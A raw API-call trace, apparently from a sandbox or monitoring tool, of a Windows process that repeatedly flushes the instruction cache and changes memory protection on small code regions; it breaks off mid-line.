[0113.812] CRetailMalloc_Realloc () returned 0xcb00ec0 [0113.812] CRetailMalloc_Free () returned 0x1 [0113.812] GetCurrentProcess () returned 0xffffffff [0113.812] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.812] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.813] GetCurrentProcess () returned 0xffffffff [0113.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.813] GetCurrentProcess () returned 0xffffffff [0113.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.813] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.813] GetCurrentProcess () returned 0xffffffff [0113.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.813] GetCurrentProcess () returned 0xffffffff [0113.813] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.813] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.814] GetCurrentProcess () returned 0xffffffff [0113.814] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.814] GetCurrentProcess () returned 0xffffffff [0113.814] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.814] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.815] GetCurrentProcess () returned 0xffffffff [0113.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.815] GetCurrentProcess () returned 0xffffffff [0113.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.815] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.815] GetCurrentProcess () returned 0xffffffff [0113.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.815] GetCurrentProcess () returned 0xffffffff [0113.815] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.815] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.816] GetCurrentProcess () returned 0xffffffff [0113.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.816] GetCurrentProcess () returned 0xffffffff [0113.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.816] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.816] GetCurrentProcess () returned 0xffffffff [0113.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.816] GetCurrentProcess () returned 0xffffffff [0113.816] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.816] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.817] GetCurrentProcess () returned 0xffffffff [0113.817] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.817] GetCurrentProcess () returned 0xffffffff [0113.817] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.817] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.817] GetCurrentProcess () returned 0xffffffff [0113.818] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.818] GetCurrentProcess () returned 0xffffffff [0113.818] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.818] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.818] GetCurrentProcess () returned 0xffffffff [0113.818] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.818] GetCurrentProcess () returned 0xffffffff [0113.818] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.818] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.818] GetCurrentProcess () returned 0xffffffff [0113.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.819] GetCurrentProcess () returned 0xffffffff [0113.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.819] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.819] GetCurrentProcess () returned 0xffffffff [0113.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.819] GetCurrentProcess () returned 0xffffffff [0113.819] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.819] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.820] GetCurrentProcess () returned 0xffffffff [0113.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.820] GetCurrentProcess () returned 0xffffffff [0113.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.820] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.820] GetCurrentProcess () returned 0xffffffff [0113.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.820] GetCurrentProcess () returned 0xffffffff [0113.820] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.820] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.821] GetCurrentProcess () returned 0xffffffff [0113.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.821] GetCurrentProcess () returned 0xffffffff [0113.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.821] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.821] GetCurrentProcess () returned 0xffffffff [0113.821] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.821] GetCurrentProcess () returned 0xffffffff [0113.822] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.822] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.822] GetCurrentProcess () returned 0xffffffff [0113.822] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.822] GetCurrentProcess () returned 0xffffffff [0113.822] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.822] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.823] GetCurrentProcess () returned 0xffffffff [0113.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.823] GetCurrentProcess () returned 0xffffffff [0113.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.823] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.823] GetCurrentProcess () returned 0xffffffff [0113.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.823] GetCurrentProcess () returned 0xffffffff [0113.823] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.823] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.824] GetCurrentProcess () returned 0xffffffff [0113.824] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.824] GetCurrentProcess () returned 0xffffffff [0113.824] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.824] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.824] GetCurrentProcess () returned 0xffffffff [0113.824] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.824] GetCurrentProcess () returned 0xffffffff [0113.824] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.824] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.825] GetCurrentProcess () returned 0xffffffff [0113.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.825] GetCurrentProcess () returned 0xffffffff [0113.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.825] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.825] GetCurrentProcess () returned 0xffffffff [0113.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.825] GetCurrentProcess () returned 0xffffffff [0113.825] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.825] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.826] GetCurrentProcess () returned 0xffffffff [0113.826] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.826] GetCurrentProcess () returned 0xffffffff [0113.826] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.826] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.827] GetCurrentProcess () returned 0xffffffff [0113.827] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.827] GetCurrentProcess () returned 0xffffffff [0113.827] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.827] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.827] GetCurrentProcess () returned 0xffffffff [0113.827] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0113.827] GetCurrentProcess () returned 0xffffffff [0113.827] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0113.827] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.828] GetCurrentProcess () returned 0xffffffff [0113.828] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0113.828] GetCurrentProcess () returned 0xffffffff [0113.828] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0113.828] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.828] GetCurrentProcess () returned 0xffffffff [0113.828] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0113.828] GetCurrentProcess () returned 0xffffffff [0113.829] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0113.829] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.829] GetCurrentProcess () returned 0xffffffff [0113.829] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0113.829] GetCurrentProcess () returned 0xffffffff [0113.829] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0113.829] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.830] GetCurrentProcess () returned 0xffffffff [0113.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0113.830] GetCurrentProcess () returned 0xffffffff [0113.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0113.830] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19710c | out: lpflOldProtect=0x19710c*=0x40) returned 1 [0113.830] GetCurrentProcess () returned 0xffffffff [0113.830] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0113.832] GetAsyncKeyState (vKey=3) returned 0 [0113.832] VarCmp (pvarLeft=0x197a1c, pvarRight=0x197a0c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0113.832] CRetailMalloc_Alloc () returned 0xcb00f20 [0113.832] memcpy (in: _Dst=0xb754f48, _Src=0x19731c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.832] memcpy (in: _Dst=0xcb00f40, _Src=0x197384, _Size=0x18 | out: _Dst=0xcb00f40) returned 0xcb00f40 [0113.832] CRetailMalloc_Realloc () returned 0xcb00f20 [0113.832] CRetailMalloc_Free () returned 0x1 [0113.832] GetCurrentProcess () returned 0xffffffff [0113.832] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0113.832] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.833] GetCurrentProcess () returned 0xffffffff [0113.833] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0113.833] GetCurrentProcess () returned 0xffffffff [0113.833] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0113.833] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.834] GetCurrentProcess () returned 0xffffffff [0113.834] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0113.834] GetCurrentProcess () returned 0xffffffff [0113.834] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0113.834] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.835] GetCurrentProcess () returned 0xffffffff [0113.835] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0113.835] GetCurrentProcess () returned 0xffffffff [0113.835] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0113.835] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.836] GetCurrentProcess () returned 0xffffffff [0113.836] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0113.836] GetCurrentProcess () returned 0xffffffff [0113.836] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0113.836] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.836] GetCurrentProcess () returned 0xffffffff [0113.836] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0113.836] GetCurrentProcess () returned 0xffffffff [0113.836] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0113.836] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.837] GetCurrentProcess () returned 0xffffffff [0113.837] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0113.837] GetCurrentProcess () returned 0xffffffff [0113.837] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0113.837] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.837] GetCurrentProcess () returned 0xffffffff [0113.837] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0113.837] GetCurrentProcess () returned 0xffffffff [0113.837] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0113.837] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.838] GetCurrentProcess () returned 0xffffffff [0113.838] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0113.838] GetCurrentProcess () returned 0xffffffff [0113.838] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0113.838] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.839] GetCurrentProcess () returned 0xffffffff [0113.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0113.839] GetCurrentProcess () returned 0xffffffff [0113.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0113.839] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.839] GetCurrentProcess () returned 0xffffffff [0113.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0113.839] GetCurrentProcess () returned 0xffffffff [0113.839] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0113.839] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.840] GetCurrentProcess () returned 0xffffffff [0113.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0113.840] GetCurrentProcess () returned 0xffffffff [0113.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0113.840] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.840] GetCurrentProcess () returned 0xffffffff [0113.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0113.840] GetCurrentProcess () returned 0xffffffff [0113.840] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0113.840] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.841] GetCurrentProcess () returned 0xffffffff [0113.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0113.841] GetCurrentProcess () returned 0xffffffff [0113.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0113.841] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.841] GetCurrentProcess () returned 0xffffffff [0113.841] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0113.842] GetCurrentProcess () returned 0xffffffff [0113.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0113.842] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.842] GetCurrentProcess () returned 0xffffffff [0113.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0113.842] GetCurrentProcess () returned 0xffffffff [0113.842] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0113.842] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.843] GetCurrentProcess () returned 0xffffffff [0113.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0113.843] GetCurrentProcess () returned 0xffffffff [0113.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0113.843] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.843] GetCurrentProcess () returned 0xffffffff [0113.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0113.843] GetCurrentProcess () returned 0xffffffff [0113.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0113.843] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.844] GetCurrentProcess () returned 0xffffffff [0113.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0113.844] GetCurrentProcess () returned 0xffffffff [0113.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0113.844] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.844] GetCurrentProcess () returned 0xffffffff [0113.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0113.844] GetCurrentProcess () returned 0xffffffff [0113.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0113.844] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.845] GetCurrentProcess () returned 0xffffffff [0113.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0113.845] GetCurrentProcess () returned 0xffffffff [0113.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0113.845] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.845] GetCurrentProcess () returned 0xffffffff [0113.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0113.845] GetCurrentProcess () returned 0xffffffff [0113.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0113.845] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.846] GetCurrentProcess () returned 0xffffffff [0113.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0113.846] GetCurrentProcess () returned 0xffffffff [0113.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0113.846] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.847] GetCurrentProcess () returned 0xffffffff [0113.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0113.847] GetCurrentProcess () returned 0xffffffff [0113.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0113.847] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.847] GetCurrentProcess () returned 0xffffffff [0113.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0113.847] GetCurrentProcess () returned 0xffffffff [0113.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0113.848] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: lpflOldProtect=0x19702c*=0x40) returned 1 [0113.848] GetCurrentProcess () returned 0xffffffff [0113.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0113.848] GetCurrentProcess () returned 0xffffffff [0113.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0113.848] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19702c | out: 